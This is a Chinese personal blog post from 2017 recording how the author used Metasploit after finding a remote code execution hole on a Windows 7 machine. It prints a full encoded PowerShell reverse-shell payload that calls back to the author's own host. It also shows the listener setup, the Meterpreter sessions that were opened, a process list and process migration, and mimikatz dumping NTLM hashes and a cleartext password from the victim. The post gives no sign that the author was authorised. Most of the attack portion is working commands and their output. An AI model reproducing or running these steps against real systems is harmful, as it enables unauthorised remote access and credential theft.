Metasploit笔记2

作者: Luan 分类: 学习笔记 发布时间: 2017-06-24 17:37

遇到个RCE,想上神器MSF,systeminfo看了下是win7,想到用powershell,很方便。

用msfvenom生成ps1后,感觉这格式不太对啊。。看了下帮助,用psh-cmd就可以了。真的方便,记个笔记。

msf > msfvenom -p windows/x64/meterpreter/reverse_tcp LPORT=443 LHOST=lu4n.com -f psh-cmd
[*] exec: msfvenom -p windows/x64/meterpreter/reverse_tcp LPORT=443 LHOST=lu4n.com -f psh-cmd

No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 510 bytes
Final size of psh-cmd file: 6739 bytes

%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAkAGUAbgB2ADoAdwBpAG4AZABpAHIAKwAnAFwAcwB5AHMAbgBhAHQAaQB2AGUAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQBlAGwAcwBlAHsAJABiAD0AJwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAJwB9ADsAJABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBTAHQAYQByAHQASQBuAGYAbwA7ACQAcwAuAEYAaQBsAGUATgBhAG0AZQA9ACQAYgA7ACQAcwAuAEEAcgBnAHUAbQBlAG4AdABzAD0AJwAtAG4AbwBwACAALQB3ACAAaABpAGQAZABlAG4AIAAtAGMAIAAkAHMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAsAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJwAnAEgANABzAEkAQQBIADgAcwBUAGwAawBDAEEANwBWAFcAYgBXAC8AYQBTAEIARAArAG4ARQByADkARAAxAGEARgBoAEYARQBJAE4AaQBsAE4AUwBLAFIASwB0AHoAWQBHAFQASABHAEMAWQB6AEIAdgBSAFoAVgBqAHIAKwAwAE4AYQA1AHYAWQA2ADQARABUADYAMwArAC8ATQBlAEMARQBYAE4ASwA3AFgAcQBXAHoAawBOAGkAWABlAFgAbgAyAG0AWgBtAGQAZABkAFAAUQBaAGkAUQBLAE8AVwBmADkANQBXAGEATQBtAHQAegAzADkAKwArAE8AQgBsAFoAcwBCAFIAeABmAGkAcgBTAFcAUABQAEsAYgA2AG4AcABvAFYAYgBtAFMATwB6AHUANwBFAEEAbABDADkAMQAyAHIAYwBuAFEARQBZAHEAVwA3AEsAOABaADkANQB2AGcANQBXAHEAMQBhAFUAVwBDAFIAYwBIAEYANQBLAGEAZAB4AGoARQBPADIAbQA5AGMANgBtAEsARQBrAHcAYwBFAHQASgBUAGoAaABLADkAeQBmADMATgBqAEgATQBUADYANQB2AHIAMwBEAE4AdQBPACsAYwA2AFYAdgB0AFEANgBOAGIAaQAyADYARgA4AHQAawB5AC8AWQB4AGQANABKAEMASgA5AC8AcgBSADcAYQBWAHcANgBzAFoASwAwAG8AWQBYAC8ANwA2AHQAVgB5AFoAbgA5AFEAWABOAGUAVQArAHQAVwBqAEMAbAA0ADAAcwBZAFQAaQBvAE8AWgBTAFcASwA5AHkAUABTAHUANQB3AG0ASwAwAHcAWAA5AGEASQBIAFUAZABKADUATABMAGEAbQBJAFEAZgBUADIAdQBqAE0ATABGAGMAZgBBAFgAVwBIAHIAQwBHAG0AUgA4ADUAUwBiAGsAQwBoADQAQgBmAGoARgBrAGEAaAAxAHgAKwBuAEYAeAAvAHQAOAB1AFgAWQBUAGkASQBJAHgAcwA1AFQAbwB3AFQARQBLADYAcAA0AFUATwAwAHgASAB3AHAAVABDAG0AdABjAG4ALwB3ADgANwAzAHoAbQB6AFIAawBKAE0AQwB3AHoAMwBBAGMAcgBRAHcAYwBQAHgAQQBiAEoANwBXAHUARgBUAG8AVQAzADIAQgAzAHcAVgAvAGgAZABYAEgAbQBYADEAWABpAEQANQBWAEEAYQBzAEQAaQBTAGgAVwBDADgAaABxAGwARgBqAGsAcAB4AFQAdgBGAGMAdQBVADEAegBzAE0ANABWAHUARAA3AFcAeQB5AEIAaABSAC8AdgAzADcAMQAvADUAeABhAHAAdwBCAHoANgA1AFQAQQBQAFkASABRADAAMwA0ADQAeABZAE8AVQBIAFUAVQBLADIAYwBwADgANQBzAGMAcABwADQATgBaAGkAVQBaAHoAQgB0AEQAUwBNAFUAMQB4AFoAYwBQAE0AOABCAFAAUABGAGcAaQB2AEYANQAvAFQANgBxAHYAcAB6AEEALwBWAEMARwBtAFQAdgBPAGgAZQBiACsAOQBIADUAagBhAFIATwB2AHMASABXADMASQB5AEkAcwB3AEQAVgBmAFoAUgBLADkAaABnAEYAVABxAGoARgBiAHIANwA1ADgANQBSAHIAWQBaAGUARQB1AEoAVwBGAFYAawBEAHMASQBxAHYANAB0AHkASwBBAFgAWQBxADMASgA2ADQAVgBZAGwAZQBBAGsAQwAvAHYATgA3AEQAVAB3AGgAUgA3AEYAcwB0AEoAcgBYAEwAegAxADIAcABLAFEATgBpAFQAcgBwAFEAUwA2AHUAQQBZADIAUgBEAEYAQgBGAEIAQgBnAEMAcwB2AHcAZQB6AGkAeABKAGYAVgBVAE0ATQBCAE0ATABhAGIAbAAvAE4AdwBRAEMANwBqAFEAbgBxAGYAdgAxAG4AaABQAFoAKwBEAFUARgBtAG0AVgBwAEoAVQB1AFUARQBLAHgAVwBSAFgATwBRAE4AYgBGAEQAdABWAEQAbwBVAEoAMgBXACsAaABsAEUAWABiAFkAZgBrAFoAcgBwAFoAUwBSAG0AdwByAFkAWQBXADUAUgBlAFUARgBtAFgAdQBuAGMAaABRAG0ATABFADUAdABpAEMAUQBRAE0ARABSAFcAMgBDAFkAVwB6AGYAbQBvAGMAbAAzAGkAWQBDAGsAegBpAEYAYwA0AEwANwAvAEoAaABtAHgAUgBTAGsASQBQAEwARAAxAEEATgBHAEEAbABaADgARgBnAGUAWAA3AEUAZwBIAE8AWABDADUAVwBhAGcAWgBrAGEAcgBDAGcATwBRAEcAaABiADIAMgAxAHEAZQBWAEQASgArADQATABZAFoAcABUAGwAWQBhAGYAOABKAHMANABpADcAWABjADUAbgB0AE4AUwA4AEgARwBBAEUAbQBKAHQAMABJAGgAVgBPAFoAUABFAEQATwA2AEoAbgBPAEwARAA3AFAAcABOAE0AQQBkAFgAeABUAE0AcwBPAGMAYgA3AEcAUABGAEYASQBjADIAbABqAE8AWABwAFgAOABMAFQAOQBxAGYAcgB2AEQAQQBLAHQAcgBiAGMAeABBAHgANABhAGMAZABSAEkARgBrAEoAUABtAHMAWQBMAEEAYgBXACsAQQArAEMAUQBsAHEAZgBCAHEAMwBvAEUAYwBHAG4AdABHADkAMABVAHoASgBHADUAawB6AFYAbgBCADQAMQBWAEcAWgBNAEYAZABJAGYAKwBiADUASwA2AHEAbwBIADgAMgB5AGsAZQBBAE0AbQByAHIANABNAGgAOQAyAGUAMABlAHEAaQB1AEwAWAB4AFgAYQBRAG0AcQB0AEsAVgBNAHIAMAB1AEkAYgB0AEwAegBzADIAZQBOAEIAcQBCAEgAcABIADcAKwB0ADEARwBSAFkANABVAGUAQgBOAHYASwBxAC8AVgBnAFQAOQBSAHcAWgBIAGMAOQAxAFEAUAAvAGkAWABWAHQAeQBWAHgASgBuAHEAUwAyAEoAYgA3AGgAdQBRAHIAUgBFAFMAZQBvAFgAZgAxAFIAbgAyAG0AQwBrADAAcQBrAFUAZABEAE4AVgBCADMALwBPAFQAdgB5AFkALwBTAGEASABRAG4AbQB5AEcANgAwAG4AcgBJAGIAMQA4ADcANwBmAHAAcABlADYAdQAvAHoAUABWAG4AeQAwADYALwBwAFcAegBuAGQAagA3AFgAcAA0AGwAQwBGAFAAQwBqAHQASwBlADYANgBlAE8AeAB1AFoATABHAFMAbgB1AG0AbQB5AHYAVgBPADEANQA3AHUAdABrAFgARwBtADEAZgBnAG4AVwBWAGIAUABvAHIAUQA0AEMAdgBYAHUAOAA5AGgATQA2AGoAUgBwAHUAUABHAHMARABWAHoAVgBtAFAANABKAG4AcQA0AGMAeABEAE8AawBMAEcATgBLAFQARwA3AFYAcABHAHEASABNACsAMgA2AFQAbgBkAGEAVQA5AGcAcgBYAGwAVQBBADAAMwArAHUAMQBLAGMANwBKAHAAVgA3AGcAdwBOAFkASgBYAEUAZABJAFYAaABOAG8AVQB5AGoAVgBBADEAcgBvAGwAMQBNAGQAUgBXAHoAYwAvADYAUwBOAEYAMwBHAFEAagBjAGIATgBXADcAbwBTADEAUQBuAHIAcgA1AGYANQAvADEARABrADcAOAB3AFMAMwBNAFIAQgBNAFEAdwAyADcAbABpADgAQgAzAHEAegBYAFcASgBMAGUATQBlAHcARgBsAGkAbABPAFgAYwBIAE0AKwBaAE8AWABvAGYAQQBZAFQAdQBoAFoAVAA5AHQAeQBDAHUAZgBSAFEAWQBmAGsAbgBGAG4AZQBEAGUAagB0AGQAQgBBAEwAMQBZAGsAZwBtAEoANwBnAEkAWgBlAGEAcQB0AGYAVQB2AFUAawBVAG4AbABwAEwAcwBEADMAMgBFAEMAQwBFAE0AMABLAHMAMwBaADYAcQAyAFkAQwBWAGsAdQBYAG8AZQBDAEwAVQBSADQAQgBIAEQASABvAGIATQBjAGMAYQA5AEoAcABnADcAMwBUADUAaABrADMARABCADIANgBkAG0AWQBXAGsASABJAGMAMAA3AGsAUgBvAHYATwB5AGMAeQBWAGwAegBvAE0ARQA1AHoARAByAFkARABNADEAMABPAE8ANgBDAFQAYwBDAGMATABwAHMANQB6AFIARABmAGwAaQBHAEgASABVAE8AZABuAEQAcQAzAE4ANQBKAHcANwBFAHcAdABUADUAbwBaAHQAaQBzADMAKwAyAE4AaQBQAGcAagBtAGgANwB3AFUAbwBCAFoASwAwAGYAMQBTAGMAVgAyAFYAWgBoAGQAYQBlAHAARABqAFAAMgB0AHMAbQBoAFUAbgB2AGsAVQBoADkANgBGAGwARgBaAGQAUgBPADQAcgBiACsANwBZAHoAaQBFAGkAdQB3AGYAUABGAFMAMgBTAEoANAB4AEIAVABhAE4AMwBRADMASQB0AEsAUgBwAFIARwBkAHQANABHAHQAegAwAEsAVwB2AEMAdQBNAFMANwBnAFEAaAByAEIAOABPAFAAcABtADYATQBLADkAeQBSAFkAZQBlADYAUAB4AGQATABsADUAUQB5AEEAdwBwADIAdwBLADkAZABhAEgANABjAGUAOAA2AHYAaQA1AHEATQBvAFEAbwBNAFQATgB3ADAAUgBqAHYAegByAHgANQBPAGoAVgBjAGIAdgBqAFYAWAB6AEYAdgBtAEMAcQBXAGMALwBkAE8AdQBuAGsAdAA4AFkAcABRAGgAeQBNAGUAdwBrADAAZgAvAE8ANAAvADYANgA4AHUASABQACsAVABjAGUAbgA5AGYAKwBZAGYAZQBYAHUAQgBXAHIATAB6AGwANAB0AGYAMQB5ADQAVAAvAFIALwBUAHMAcwBqAEMAMwBDAFEATgBpAEEAaQA1AGYAaQAzAGEAdgBnAGIAVABMADIAKwBYAFAAdwBxAEMAbwBpAEIAZgBuAGgANwByAC8AOABXAFgAdQBkAHMAcABNAHIAZQBHAC8AOQBCAFQAdQA4AE0AKwBaAFEAQwB3AEEAQQAnACcAKQApADsASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACgAJABzACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsAJwA7ACQAcwAuAFUAcwBlAFMAaABlAGwAbABFAHgAZQBjAHUAdABlAD0AJABmAGEAbABzAGUAOwAkAHMALgBSAGUAZABpAHIAZQBjAHQAUwB0AGEAbgBkAGEAcgBkAE8AdQB0AHAAdQB0AD0AJAB0AHIAdQBlADsAJABzAC4AVwBpAG4AZABvAHcAUwB0AHkAbABlAD0AJwBIAGkAZABkAGUAbgAnADsAJABzAC4AQwByAGUAYQB0AGUATgBvAFcAaQBuAGQAbwB3AD0AJAB0AHIAdQBlADsAJABwAD0AWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAUwB0AGEAcgB0ACgAJABzACkAOwA=msf > use multi/handler
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST lu4n.com
LHOST => lu4n.com
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > run

[*] Started reverse TCP handler on 103.27.187.212:443 
[*] Starting the payload handler...
[*] Sending stage (1189423 bytes) to 1.1.1.1
[*] Meterpreter session 1 opened (103.27.187.212:443 -> 1.1.1.1:27185) at 2017-06-24 17:12:16 +0800

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.1.107 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(handler) > run

[*] Started reverse TCP handler on 103.27.187.212:443 
[*] Starting the payload handler...
[*] Sending stage (1189423 bytes) to 2.2.2.2
[*] Meterpreter session 2 opened (103.27.187.212:443 -> 2.2.2.2:63796) at 2017-06-24 17:13:12 +0800
meterpreter > sysinfo
Computer        : JDE920-PC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 4
Meterpreter     : x64/windows
meterpreter > ps 
Process List
============

 PID   PPID  Name                          Arch  Session  User                          Path
 ---   ----  ----                          ----  -------  ----                          ----
 0     0     [System Process]                                                           
 4     0     System                        x64   0                                      
 256   4     smss.exe                      x64   0        NT AUTHORITY\SYSTEM           \SystemRoot\System32\smss.exe
 272   476   svchost.exe                   x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\system32\svchost.exe
 332   320   csrss.exe                     x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\csrss.exe
 380   372   csrss.exe                     x64   1        NT AUTHORITY\SYSTEM           C:\Windows\system32\csrss.exe
 388   320   wininit.exe                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\wininit.exe
 416   372   winlogon.exe                  x64   1        NT AUTHORITY\SYSTEM           C:\Windows\system32\winlogon.exe
 476   388   services.exe                  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\services.exe
 484   388   lsass.exe                     x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\lsass.exe
 488   476   svchost.exe                   x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\system32\svchost.exe
 492   388   lsm.exe                       x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\lsm.exe
 588   476   svchost.exe                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\svchost.exe
 652   476   VBoxService.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\VBoxService.exe
 664   1768  cmd.exe                       x64   1        JDE920-PC\JDE920              C:\Windows\system32\cmd.exe
 716   476   svchost.exe                   x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\system32\svchost.exe
 808   476   svchost.exe                   x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 840   476   svchost.exe                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 868   476   svchost.exe                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\svchost.exe
 1132  476   spoolsv.exe                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
 1184  476   svchost.exe                   x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\system32\svchost.exe
 1260  476   svchost.exe                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 1308  476   svchost.exe                   x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\system32\svchost.exe
 1348  476   FoxitConnectedPDFService.exe  x86   0        NT AUTHORITY\SYSTEM           C:\Program Files (x86)\Foxit Software\Foxit Reader\FoxitConnectedPDFService.exe
 1428  380   conhost.exe                   x64   1        JDE920-PC\JDE920              C:\Windows\system32\conhost.exe
 1460  1768  VBoxTray.exe                  x64   1        JDE920-PC\JDE920              C:\Windows\System32\VBoxTray.exe
 1464  1576  opmn.exe                      x64   1        JDE920-PC\JDE920              C:\Oracle\Middleware\OVR_HOME\Oracle_BI1\opmn\bin\opmn.exe
 1572  1768  cmd.exe                       x64   1        JDE920-PC\JDE920              C:\Windows\System32\cmd.exe
 1576  2024  opmn.exe                      x64   1        JDE920-PC\JDE920              C:\Oracle\Middleware\OVR_HOME\Oracle_BI1\opmn\bin\opmn.exe
 1580  476   TNSLSNR.EXE                   x64   0        JDE920-PC\920JDE              C:\Oracle\E1Local\BIN\TNSLSNR.exe
 1656  380   conhost.exe                   x64   1        JDE920-PC\JDE920              C:\Windows\system32\conhost.exe
 1716  840   dwm.exe                       x64   1        JDE920-PC\JDE920              C:\Windows\system32\Dwm.exe
 1732  476   taskhost.exe                  x64   1        JDE920-PC\JDE920              C:\Windows\system32\taskhost.exe
 1768  1704  explorer.exe                  x64   1        JDE920-PC\JDE920              C:\Windows\Explorer.EXE
 1876  476   oracle.exe                    x64   0        JDE920-PC\920JDE              c:\oracle\e1local\bin\ORACLE.EXE
 1940  476   oravssw.exe                   x64   0        JDE920-PC\920JDE              c:\oracle\e1local\bin\OraVSSW.exe
 2160  476   wmpnetwk.exe                  x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Program Files\Windows Media Player\wmpnetwk.exe
 2176  1572  java.exe                      x64   1        JDE920-PC\JDE920              C:\Oracle\MIDDLE~1\OVR_HOME\ORACLE~2\jdk\bin\java.exe
 2676  476   ducservice.exe                x86   0        NT AUTHORITY\SYSTEM           C:\Program Files (x86)\No-IP\ducservice.exe
 2792  476   SearchIndexer.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\SearchIndexer.exe
 3012  476   svchost.exe                   x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\system32\svchost.exe
 3136  1464  sawserver.exe                 x64   1        JDE920-PC\JDE920              C:\Oracle\Middleware\OVR_HOME\Oracle_BI1\bifoundation\web\bin\sawserver.exe
 3144  1464  java.exe                      x64   1        JDE920-PC\JDE920              C:\Oracle\Middleware\OVR_HOME\Oracle_BI1\jdk\bin\java.exe
 3152  1464  nqsserver.exe                 x64   1        JDE920-PC\JDE920              C:\Oracle\Middleware\OVR_HOME\Oracle_BI1\bifoundation\server\bin\nqsserver.exe
 3164  1464  nqscheduler.exe               x64   1        JDE920-PC\JDE920              C:\Oracle\Middleware\OVR_HOME\Oracle_BI1\bifoundation\server\bin\nqscheduler.exe
 3180  1464  nqsclustercontroller.exe      x64   1        JDE920-PC\JDE920              C:\Oracle\Middleware\OVR_HOME\Oracle_BI1\bifoundation\server\bin\nqsclustercontroller.exe
 3824  6196  java.exe                      x86   1        JDE920-PC\JDE920              C:\PROGRA~2\Java\JDK17~1.0_8\bin\java.exe
 4288  4492  LaunchJVM.exe                 x86   1        JDE920-PC\JDE920              C:\JDEdwards\E920\system\bin32\LaunchJVM.exe
 4348  5764  fenix.exe                     x86   1        JDE920-PC\JDE920              C:\ProgramData\Fenix\fenix.exe
 4492  1768  activConsole.exe              x86   1        JDE920-PC\JDE920              C:\JDEdwards\E920\system\bin32\activConsole.exe
 4668  4492  iexplore.exe                  x86   1        JDE920-PC\JDE920              C:\Program Files (x86)\Internet Explorer\iexplore.exe
 5104  4668  iexplore.exe                  x86   1        JDE920-PC\JDE920              C:\Program Files (x86)\Internet Explorer\iexplore.exe
 5348  380   conhost.exe                   x64   1        JDE920-PC\JDE920              C:\Windows\system32\conhost.exe
 5436  2176  powershell.exe                x64   1        JDE920-PC\JDE920              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
 5736  4572  iexplore.exe                  x86   1        JDE920-PC\JDE920              C:\Program Files (x86)\Internet Explorer\iexplore.exe
 5764  1768  fenix.exe                     x86   1        JDE920-PC\JDE920              C:\ProgramData\Fenix\fenix.exe
 6160  380   conhost.exe                   x64   1        JDE920-PC\JDE920              C:\Windows\system32\conhost.exe
 6196  6204  cmd.exe                       x86   1        JDE920-PC\JDE920              C:\Windows\SysWOW64\cmd.exe
 6220  3824  cmd.exe                       x86   1        JDE920-PC\JDE920              C:\Windows\SysWOW64\cmd.exe
 6528  4492  jdenet_n.exe                  x86   1        JDE920-PC\JDE920              C:\JDEdwards\E920\system\bin32\jdenet_n.exe
 7036  5436  powershell.exe                x64   1        JDE920-PC\JDE920              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
 7060  6220  java.exe                      x86   1        JDE920-PC\JDE920              C:\PROGRA~2\Java\JDK17~1.0_8\bin\java.exe
 7140  380   conhost.exe                   x64   1        JDE920-PC\JDE920              C:\Windows\system32\conhost.exe
meterpreter > migrate 2792 
[*] Migrating from 7036 to 2792... 
[*] Migration completed successfully. 
meterpreter > load mimikatz
Loading extension mimikatz...success.
meterpreter > msv
[+] Running as SYSTEM
[*] Retrieving msv credentials
msv credentials
===============

AuthID    Package    Domain        User           Password
------    -------    ------        ----           --------
0;102261  NTLM       JDE920-PC     920JDE         lm{ 44efce164ab921caaad3b435b51404ee }, ntlm{ 32ed87bdb5fdc5e9cba88547376818d4 }
0;98726   NTLM       JDE920-PC     920JDE         lm{ 44efce164ab921caaad3b435b51404ee }, ntlm{ 32ed87bdb5fdc5e9cba88547376818d4 }
0;92043   NTLM       JDE920-PC     JDE920         lm{ 44efce164ab921caaad3b435b51404ee }, ntlm{ 32ed87bdb5fdc5e9cba88547376818d4 }
0;86291   NTLM       JDE920-PC     920JDE         lm{ 44efce164ab921caaad3b435b51404ee }, ntlm{ 32ed87bdb5fdc5e9cba88547376818d4 }
0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE  n.s. (Credentials KO)
0;996     Negotiate  WORKGROUP     JDE920-PC$     n.s. (Credentials KO)
0;24337   NTLM                                    n.s. (Credentials KO)
0;999     NTLM       WORKGROUP     JDE920-PC$     n.s. (Credentials KO)

meterpreter > kerberos
[+] Running as SYSTEM
[*] Retrieving kerberos credentials
kerberos credentials
====================

AuthID    Package    Domain        User           Password
------    -------    ------        ----           --------
0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE  
0;996     Negotiate  WORKGROUP     JDE920-PC$     
0;24337   NTLM                                    
0;999     NTLM       WORKGROUP     JDE920-PC$     
0;102261  NTLM       JDE920-PC     920JDE         123456
0;98726   NTLM       JDE920-PC     920JDE         123456
0;92043   NTLM       JDE920-PC     JDE920         123456
0;86291   NTLM       JDE920-PC     920JDE         123456

meterpreter > background
[*] Backgrounding session 2...
msf exploit(handler) >

如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!

3条评论
  • wenyu

    2017年8月2日 上午10:31

    想打赏来着。。。没连接啊,哈哈哈哈

  • lsh4ck

    2017年7月26日 上午11:56

    你的好了
    我的
    lsh4ck’s blog
    www.lshack.cn

    1. Luan

      2017年7月27日 下午12:32

      没看到啊

发表评论